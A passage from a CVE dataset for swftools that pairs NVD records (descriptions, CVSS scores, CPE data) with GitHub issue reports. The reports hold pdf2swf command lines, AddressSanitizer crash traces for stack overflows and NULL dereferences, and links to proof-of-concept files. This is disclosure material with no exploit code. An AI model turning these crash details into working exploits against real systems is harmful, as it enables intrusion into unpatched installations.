int, int, int) xpdf/Parser.cc:156 #323 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #324 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #325 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #326 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #327 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #328 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #329 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #330 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #331 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #332 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #333 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #334 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 SUMMARY: AddressSanitizer: stack-overflow ??:0 ?? ==17568==ABORTING ``` ## POC [stack-overflow-gmalloc-gmem-101.zip](https://github.com/matthiaskramm/swftools/files/5009733/stack-overflow-gmalloc-gmem-101.zip)
Segmentation fault error in xpdf/gmem.cc:101
https://api.github.com/repos/swftools/swftools/issues/97/comments
0
2020-07-31T14:00:06Z
2020-08-01T02:37:17Z
https://github.com/swftools/swftools/issues/97
669,847,515
97
2,568
CVE-2021-39558
2021-09-20T16:15:13.397
An issue was discovered in swftools through 20200710. A stack-buffer-overflow exists in the function VectorGraphicOutputDev::drawGeneralImage() located in VectorGraphicOutputDev.cc. It allows an attacker to cause code Execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/106" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/106" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/matthiaskramm/swftools/issues/106
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), pdf2swf (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./pdf2swf -qq -z -o /dev/null ./stack-overflow-drawGeneralImage-VectorGraphicOutputDev-1158 ## AddressSanitizer output ``` ================================================================= ==6137==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffd2a9dcbb0 at pc 0x55fd97e56068 bp 0x7ffd2a9dc230 sp 0x7ffd2a9dc220 WRITE of size 1 at 0x7ffd2a9dcbb0 thread T0 #0 0x55fd97e56067 in VectorGraphicOutputDev::drawGeneralImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int, int, int, int*, Stream*, int, int, int, GfxImageColorMap*) /home/seviezhou/swftools/lib/pdf/VectorGraphicOutputDev.cc:1158 #1 0x55fd97e58db0 in VectorGraphicOutputDev::drawSoftMaskedImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, Stream*, int, int, GfxImageColorMap*) /home/seviezhou/swftools/lib/pdf/VectorGraphicOutputDev.cc:1475 #2 0x55fd97d658a8 in Gfx::doImage(Object*, Stream*, int) xpdf/Gfx.cc:3658 #3 0x55fd97d81d42 in Gfx::opXObject(Object*, int) xpdf/Gfx.cc:3336 #4 0x55fd97d4f5e5 in Gfx::go(int) xpdf/Gfx.cc:584 #5 0x55fd97d50e9f in Gfx::display(Object*, int) xpdf/Gfx.cc:556 #6 0x55fd97cefe20 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) xpdf/Page.cc:317 #7 0x55fd97cf0d4a in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) xpdf/Page.cc:266 #8 0x55fd97bf6d02 in render2 /home/seviezhou/swftools/lib/pdf/pdf.cc:164 #9 0x55fd97bf7bde in pdfpage_rendersection(_gfxpage*, _gfxdevice*, double, double, double, double, double, double) /home/seviezhou/swftools/lib/pdf/pdf.cc:191 #10 0x55fd97a75deb in main /home/seviezhou/swftools/src/pdf2swf.c:831 #11 0x7f3da48a4b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #12 0x55fd97a7df09 in _start (/home/seviezhou/swftools/src/pdf2swf+0x17cf09) Address 0x7ffd2a9dcbb0 is located in stack of thread T0 at offset 2240 in frame #0 0x55fd97e5202f in VectorGraphicOutputDev::drawGeneralImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int, int, int, int*, Stream*, int, int, int, GfxImageColorMap*) /home/seviezhou/swftools/lib/pdf/VectorGraphicOutputDev.cc:1127 This frame has 15 object(s): [32, 36) 'gray' [96, 104) 'x1' [160, 168) 'y1' [224, 232) 'x2' [288, 296) 'y2' [352, 360) 'x3' [416, 424) 'y3' [480, 488) 'x4' [544, 552) 'y4' [608, 620) 'rgb' [672, 752) 'color_transform' [800, 1824) 'pal' [1856, 1860) 'pixBuf' [1920, 1928) 'buf' [1984, 2240) 'pal' <== Memory access at offset 2240 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/seviezhou/swftools/lib/pdf/VectorGraphicOutputDev.cc:1158 VectorGraphicOutputDev::drawGeneralImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int, int, int, int*, Stream*, int, int, int, GfxImageColorMap*) Shadow bytes around the buggy address: 0x100025533920: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100025533930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100025533940: 00 00 f2 f2 f2 f2 04 f4 f4 f4 f2 f2 f2 f2 00 f4 0x100025533950: f4 f4 f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 0x100025533960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x100025533970: 00 00 00 00 00 00[f3]f3 f3 f3 f3 f3 f3 f3 00 00 0x100025533980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100025533990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000255339a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000255339b0: 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4 0x1000255339c0: f4 f4 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==6137==ABORTING ``` ## POC [stack-overflow-drawGeneralImage-VectorGraphicOutputDev-1158.zip](https://github.com/matthiaskramm/swftools/files/5011584/stack-overflow-drawGeneralImage-VectorGraphicOutputDev-1158.zip)
A stack-buffer-overflow in VectorGraphicOutputDev.cc:1158
https://api.github.com/repos/swftools/swftools/issues/106/comments
0
2020-08-02T03:17:40Z
2020-08-02T03:17:40Z
https://github.com/swftools/swftools/issues/106
671,446,394
106
2,569
CVE-2021-39559
2021-09-20T16:15:13.440
An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function GString::~GString() located in GString.cc. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/101" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/101" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/matthiaskramm/swftools/issues/101
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), pdf2swf (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./pdf2swf -qq -z -o /dev/null ./SEGV-GString-GString-173 ## AddressSanitizer output ``` Error: Type 4 function isn't a stream ASAN:SIGSEGV ================================================================= ==12533==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x56502776e723 bp 0xbebebebebebebebe sp 0x7ffd8b037888 T0) #0 0x56502776e722 in GString::~GString() xpdf/GString.cc:173 #1 0x565027977b24 in PostScriptFunction::~PostScriptFunction() xpdf/Function.cc:1060 #2 0x565027977c20 in PostScriptFunction::~PostScriptFunction() xpdf/Function.cc:1061 #3 0x565027983f99 in Function::parse(Object*) xpdf/Function.cc:74 #4 0x565027949ac9 in GfxRadialShading::parse(Dict*) xpdf/GfxState.cc:2220 #5 0x56502795e0f9 in GfxShading::parse(Object*) xpdf/GfxState.cc:1691 #6 0x56502795e668 in GfxShadingPattern::parse(Object*) xpdf/GfxState.cc:1588 #7 0x56502795f147 in GfxPattern::parse(Object*) xpdf/GfxState.cc:1447 #8 0x5650278bf347 in GfxResources::lookupPattern(char*) xpdf/Gfx.cc:388 #9 0x5650278c8620 in Gfx::opSetFillColorN(Object*, int) xpdf/Gfx.cc:1248 #10 0x5650278c35e5 in Gfx::go(int) xpdf/Gfx.cc:584 #11 0x5650278c4e9f in Gfx::display(Object*, int) xpdf/Gfx.cc:556 #12 0x565027863e20 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) xpdf/Page.cc:317 #13 0x565027864d4a in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) xpdf/Page.cc:266 #14 0x5650277665af in pdf_open /home/seviezhou/swftools/lib/pdf/pdf.cc:542 #15 0x5650275e87d5 in main /home/seviezhou/swftools/src/pdf2swf.c:737 #16 0x7f4cd0492b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #17 0x5650275f1f09 in _start (/home/seviezhou/swftools/src/pdf2swf+0x17cf09) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV xpdf/GString.cc:173 GString::~GString() ==12533==ABORTING ``` ## POC [SEGV-GString-GString-173.zip](https://github.com/matthiaskramm/swftools/files/5009711/SEGV-GString-GString-173.zip)
A SEGV in xpdf/GString.cc:173
https://api.github.com/repos/swftools/swftools/issues/101/comments
0
2020-08-01T02:18:46Z
2020-08-01T02:18:46Z
https://github.com/swftools/swftools/issues/101
670,436,539
101
2,570
CVE-2021-39561
2021-09-20T16:15:13.480
An issue was discovered in swftools through 20200710. A stack-buffer-overflow exists in the function Gfx::opSetFillColorN() located in Gfx.cc. It allows an attacker to cause code Execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/102" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/102" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/matthiaskramm/swftools/issues/102
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), pdf2swf (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./pdf2swf -qq -z -o /dev/null ## AddressSanitizer output ``` Error (492): Unknown operator 'P0' ================================================================= ==37915==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffea7ecce40 at pc 0x55895bd1c3a4 bp 0x7ffea7eccc30 sp 0x7ffea7eccc20 READ of size 4 at 0x7ffea7ecce40 thread T0 #0 0x55895bd1c3a3 in Gfx::opSetFillColorN(Object*, int) xpdf/Gfx.cc:1258 #1 0x55895bd165e5 in Gfx::go(int) xpdf/Gfx.cc:584 #2 0x55895bd17e9f in Gfx::display(Object*, int) xpdf/Gfx.cc:556 #3 0x55895bcb6e20 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) xpdf/Page.cc:317 #4 0x55895bcb7d4a in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) xpdf/Page.cc:266 #5 0x55895bbb95af in pdf_open /home/seviezhou/swftools/lib/pdf/pdf.cc:542 #6 0x55895ba3b7d5 in main /home/seviezhou/swftools/src/pdf2swf.c:737 #7 0x7f4ea43d5b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x55895ba44f09 in _start (/home/seviezhou/swftools/src/pdf2swf+0x17cf09) Address 0x7ffea7ecce40 is located in stack of thread T0 at offset 80 in frame #0 0x55895bd15cef in Gfx::go(int) xpdf/Gfx.cc:561 This frame has 2 object(s): [32, 48) 'obj' [96, 624) 'args' <== Memory access at offset 80 underflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow xpdf/Gfx.cc:1258 Gfx::opSetFillColorN(Object*, int) Shadow bytes around the buggy address: 0x100054fd1970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100054fd1980: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 0x100054fd1990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100054fd19a0: f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00 0x100054fd19b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 =>0x100054fd19c0: f1 f1 00 00 f4 f4 f2 f2[f2]f2 00 00 00 00 00 00 0x100054fd19d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100054fd19e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100054fd19f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100054fd1a00: 00 00 00 00 00 00 00 00 00 00 00 00 f4 f4 f3 f3 0x100054fd1a10: f3 f3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==37915==ABORTING ``` ## POC [stack-overflow-opSetFillColorN-Gfx-1258.zip](https://github.com/matthiaskramm/swftools/files/5009727/stack-overflow-opSetFillColorN-Gfx-1258.zip)
A stack overflow in xpdf/Gfx.cc:1258
https://api.github.com/repos/swftools/swftools/issues/102/comments
0
2020-08-01T02:31:55Z
2020-08-01T02:31:55Z
https://github.com/swftools/swftools/issues/102
670,444,172
102
2,571
CVE-2021-39562
2021-09-20T16:15:13.527
An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function FileStream::makeSubStream() located in Stream.cc. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/98" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/98" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/matthiaskramm/swftools/issues/98
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), pdf2swf (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./pdf2swf -qq -z -o /dev/null ./stack-overflow-Stream-598 ## Output ``` Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==34903==ERROR: AddressSanitizer: stack-overflow on address 0x7fff90f8fff8 (pc 0x7fbe969a553e bp 0x7fff90f90860 sp 0x7fff90f90000 T0) #0 0x7fbe969a553d in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9953d) #1 0x5561d4fe12ce in FileStream::makeSubStream(unsigned int, int, unsigned int, Object*) xpdf/Stream.cc:598 #2 0x5561d50328b6 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:810 #3 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #4 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #5 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #6 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #7 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #8 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #9 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #10 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #11 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #12 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #13 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #14 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #15 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #16 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #17 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #18 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #19 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #20 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #21 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #22 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #23 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #24 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #25 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #26 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #27 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #28 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #29 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #30 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #31 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #32 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #33 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #34 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #35 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #36 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #37 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #38 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #39 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #40 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #41 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #42 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #43 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #44 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #45 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #46 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #47 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #48 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #49 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #50 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #51 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #52 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #53 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #54 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #55 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #56 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #57 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #58 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #59 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #60 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, 